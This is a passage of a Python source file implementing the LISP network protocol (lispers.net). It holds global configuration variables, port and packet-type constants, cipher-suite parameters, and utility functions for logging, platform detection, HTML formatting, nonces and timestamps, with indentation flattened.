# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import hex
from builtins import str
from builtins import int
from builtins import range
from builtins import object
from past.utils import old_div
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import copy
import chacha
import poly1305
import geopy
import curve25519
from subprocess import getoutput
import queue
import distro
import pprint
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by user we don't do rate-limiting for
# 1 minute so we can load up the cache quicker.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictoinary array indexed by group address string. The value of the nested
# dictionay array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
LISP_SEND_PUBSUB_ACTION = 6
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied",
"auth-failure", "send-subscribe"]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
LISP_RLOC_PROBE_TTL = 64 # Typical default, don't change!
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (distro.linux_distribution()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(distro.linux_distribution()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(distro.linux_distribution()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(distro.linux_distribution()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(distro.linux_distribution()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(distro.linux_distribution()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_is_python2
#
# Return True if this code is running Python 2.7.x.
#
def lisp_is_python2():
ver = sys.version.split()[0]
return(ver[0:3] == "2.7")
#enddef
#
# lisp_is_python3
#
# Return True if this code is running Python 3.x.x.
#
def lisp_is_python3():
ver = sys.version.split()[0]
return(ver[0:2] == "3.")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print("{}: {}:".format(ts, lisp_log_id), end=" ")
for arg in args:
if (arg == "force"): continue
print(arg, end=" ")
#endfor
print()
try: sys.stdout.flush()
except: pass
return
#enddef
#
# fprint
#
# Do a lprint() when debug logging is off but "force" flag is supplied and
# can print messages..
#
def fprint(*args):
nargs = args + ("force",)
lprint(*nargs)
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# cprint
#
# Print the class instance.
#
def cprint(instance):
print("{}:".format(instance))
pprint.pprint(instance.__dict__)
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print(red(">>>", False), end=" ")
print("{}:".format(ts), end=" ")
for arg in args: print(arg, end=" ")
print(red("<<<\n", False))
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_caller
#
# Print out calling stack.
#
def lisp_print_caller():
fprint(traceback.print_last())
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
lisp_uptime = lisp_get_timestamp()
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
